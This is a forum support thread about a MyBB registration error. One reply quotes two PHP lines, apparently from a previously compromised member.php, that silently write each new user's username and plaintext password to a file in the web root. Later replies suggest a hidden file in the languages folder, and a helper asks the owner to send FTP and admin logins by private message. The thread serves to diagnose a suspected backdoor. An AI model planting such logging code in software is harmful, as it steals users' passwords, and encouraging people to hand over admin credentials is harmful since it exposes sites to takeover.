MyBB Community Forums

Full Version: Cant Open File error
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2
Someone is trying to join my site but gets this error. Other people have no problem joining, that I know of.
[Image: 0ZMHv.png]
I think your forum might have an exploit installed where it logs users details when they try and register.

I came across this before. They had the following in their member.php:

$file = fopen($_SERVER['DOCUMENT_ROOT'].'/paroles.txt', 'a');
fwrite($file, $mybb->input['username'] . " " . $mybb->input['password'] . "\n\n"); 

http://community.mybb.com/thread-77360-p...#pid566459

Download a copy of your member.php, and search for "fopen" without quotes.

Better to be safe than sorry.
I dont have fopen....
What did you change since I registered today?
Nothing, All I did was install page manager and PHP and Template Conditionals
In the inc/languages/ folder, make sure you don't have extra files in there but only files for your languages installed. If you only have English installed, it should only have:
english/ (folder)
english.php
index.html

I've seen exploits making use of the languages folder.

If you wish, I can track down this problem if you PM me your FTP logins, ACP logins and an extra test account for logging in.
(2011-06-05, 08:39 AM)Aries-Belgium Wrote: [ -> ]In the inc/languages/ folder, make sure you don't have extra files in there but only files for your languages installed. If you only have English installed, it should only have:
english/ (folder)
english.php
index.html

I've seen exploits making use of the languages folder.

If you wish, I can track down this problem if you PM me your FTP logins, ACP logins and an extra test account for logging in.
I did have one! Extra signup questions file was placed in there on mistake. I will see if you can join now.
Edit-He still gets the same error.
(2011-06-05, 08:39 AM)Aries-Belgium Wrote: [ -> ]If you wish, I can track down this problem if you PM me your FTP logins, ACP logins and an extra test account for logging in.

Bump.
Did you PM Aries-Belgium details like he offered, or...??
Pages: 1 2